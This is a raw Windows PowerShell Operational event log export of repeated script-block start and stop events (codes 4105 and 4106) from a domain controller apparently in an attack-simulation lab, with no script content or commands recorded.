LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468970
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468969
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468968
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468967
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468966
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468965
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468964
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468963
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468962
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468961
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468960
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468959
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468958
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468957
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468956
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468955
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468954
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468953
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468952
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468951
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468950
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468949
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468948
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468947
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468946
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468945
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468944
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468943
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468942
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468941
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468940
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468939
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468938
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468937
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468936
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468935
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468934
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468933
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468932
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468931
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468930
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468929
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468928
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468927
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468926
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468925
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468924
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468923
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468922
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468921
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469194
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469193
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469192
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469191
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469190
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469189
Keywords=None
